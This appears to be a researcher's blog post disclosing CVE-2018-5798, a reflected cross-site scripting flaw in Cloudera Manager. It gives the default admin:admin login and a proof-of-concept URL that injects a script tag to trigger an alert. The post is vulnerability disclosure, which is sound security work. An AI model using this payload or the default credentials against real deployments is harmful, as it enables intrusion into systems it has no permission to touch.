Mar 23 2025

CVE-2018-5798 – Cross-site scripting vulnerability in Cloudera Manager – Part 2

Author: Shafeeque Olassery Kunnikkal | Category: Cross Site Scripting, CVE-2018-5798, Cyber Security | Leave a Comment

Below is the details of the reflected XSS , I have found in Cloudera Enterprise. More details can be found here :-  https://www.cloudera.com/documentation/other/securitybulletins/topics/Security-Bulletin.html#DOCS-3186

Login to Cloudera manager using credentials
admin:admin

1. Navigate the following URL which includes the XSS Payload.

xss

2. Navigate the following URL in browser after login to Cloudera Manager, use these credentials for login:- admin:admin

http://localhost:7180/cmf/config2/dialog?metadataUrl=%2fcmf%2fclusters%2f1%2fsearchConfig%2fmetadata.json%3fserviceDep%3dtrue%26q%3dspark_on_yarn%3C%2fscript%3E%3Cscript%3Ealert%28%27reflected%20xss%27%29%3C%2fscript%3E

Will see the XSS payload executed as shown in the image below.

XSS

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Categories

Tags

SDR Cyber Security Email Fraud Cloudera Enterprise Cloudera Manager partial-knowledge testing Computer Forensics Degree XSS CVE-2018-1528 Ethical Hacking IBM Maximo Asset Management Cyber Security Degree Vulnerability Assessment Information Security Reflected XSS CVE-2018-5798 Penetration Testing Grey Box Penetration Testing zero-knowledge testing CubicSDR E-Books Social Engineering Career Options Phishing Career complete-knowledge testing White Box Penetration Testing Black Box Penetration Testing Education Clickjacking Computer Forensics

Archives